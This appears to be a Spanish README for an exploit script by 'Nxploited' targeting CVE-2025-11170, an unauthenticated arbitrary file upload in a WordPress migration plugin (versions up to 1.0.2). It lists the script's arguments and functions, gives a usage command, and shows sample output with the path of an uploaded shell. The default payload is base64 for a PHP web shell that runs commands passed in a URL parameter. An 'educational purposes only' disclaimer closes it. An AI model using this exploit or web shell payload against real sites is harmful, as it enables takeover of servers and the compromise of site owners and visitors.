
Plugin de migración de WP para CPI <= 1.0.2 - Subida arbitraria de archivos sin autenticación
WP移行専用プラグイン for CPI <= 1.0.2 - Carga arbitraria de archivos no autenticada
El plugin WP移行専用プラグイン for CPI para WordPress es vulnerable a la carga arbitraria de archivos debido a la falta de validación del tipo de archivo en la función Cpiwm_Import_Controller::import en todas las versiones hasta la 1.0.2 inclusive.
Esto permite a atacantes no autenticados cargar archivos arbitrarios en el servidor del sitio afectado, lo que potencialmente permite la ejecución remota de código.
CVE-2025-11170.py| Argumento | Descripción |
|---|---|
-u, --url | URL base del objetivo (p. ej., http://target.com/wordpress/). El script añade wp-admin/admin-ajax.php automáticamente. |
-f, --filename | Nombre del shell o archivo a cargar. Por defecto: shell.php |
-d, --data | Contenido del archivo en base64 (o texto plano). Por defecto: PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+ |
-i, --index | Valor del campo índice. Por defecto: 0 |
-H, --headers | Cabeceras HTTP adicionales (formato: X-Key:Value;K2:Value2) |
-t, --timeout | Tiempo de espera para la solicitud HTTP (segundos). Por defecto: 10 |
--retries | Número de reintentos. Por defecto: 3 |
--backoff | Factor de retroceso entre reintentos (segundos). Por defecto: 0.7 |
-v, --verbose | Aumenta la verbosidad para depuración (repetible) |
Nxploited_parse_args
Analiza y valida los argumentos de entrada. Asegura la estructura de endpoint correcta, las cabeceras y la codificación de datos.
Nxploited_logging
Configura registro avanzado y verbosidad para una salida detallada o mínima en tiempo de ejecución.
Nxploited_retry_session
Inicializa una sesión persistente con lógica de reintentos y retroceso para comunicaciones resilientes.
Nxploited_build_payload
Construye los parámetros de la solicitud POST para la explotación.
Nxploited_send
Realiza la solicitud POST real al endpoint vulnerable y gestiona respuestas/errores.
Nxploited_output_result
Procesa y formatea la respuesta, mostrando la ruta del shell en caso de éxito, o información de depuración en caso contrario.
python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"
Salida de ejemplo:
Uploading shell...
Processing response...
[+] Upload successful!
Shell path:
http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
Nxploited
My GitHub: https://github.com/Nxploited
Este script se proporciona solo con fines educativos.
El uso de este exploit en objetivos sin la autorización adecuada puede ser ilegal.
El autor no asume NINGUNA responsabilidad por cualquier uso indebido, daños o consecuencias legales.
GitHub: Nxploited
Telegram: KNxploited
Por: Nxploited ( Khaled Alenazi )